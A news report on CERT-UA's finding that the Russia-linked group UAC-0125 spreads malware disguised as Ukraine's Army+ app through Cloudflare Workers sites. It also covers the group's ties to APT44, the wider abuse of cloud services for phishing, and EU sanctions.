The Computer Emergency Response Team of Ukraine (CERT-UA) has reported that the cyber threat actor UAC-0125 is using Cloudflare Workers to distribute malware disguised as the Army+ app. This app, launched by Ukraine's Ministry of Defence in August 2024, aims to digitize the armed forces' operations.
The fake Army+ app is promoted via malicious Cloudflare Workers websites, where users are tricked into downloading a Windows executable disguised as the legitimate app. The installer, created with the Nullsoft Scriptable Install System (NSIS), displays a decoy file to the user while silently executing a PowerShell script. This script installs OpenSSH on the victim’s machine, generates RSA cryptographic keys, and sends the private key to an attacker-controlled server via the TOR network, granting the threat actor remote access to the compromised system.
CERT-UA has linked UAC-0125 to another notorious Russian-backed APT group, UAC-0002, also known as APT44, FROZENBARENTS, and several other aliases. This group is believed to be affiliated with Unit 74455 of the Russian GRU (Main Directorate of the General Staff of the Armed Forces).
This attack highlights an ongoing trend of cybercriminals abusing legitimate cloud services, such as Cloudflare Workers, to host malicious content. Earlier in 2024, Fortra reported a sharp rise in phishing attacks using Cloudflare Workers and Pages, with phishing incidents on Cloudflare Pages increasing by 198% and those on Cloudflare Workers growing by 104% from 2023 to mid-October 2024.
The development comes amidst the European Council’s recent sanctions targeting individuals and entities involved in Russia’s destabilizing actions, including those linked to the GRU. These sanctions target entities involved in disinformation campaigns, foreign assassinations, and cyberattacks across Europe, as well as actors promoting Russian propaganda in Africa.
The growing abuse of legitimate services for cyberattacks underscores the evolving tactics of threat actors seeking to exploit trusted platforms for malicious purposes.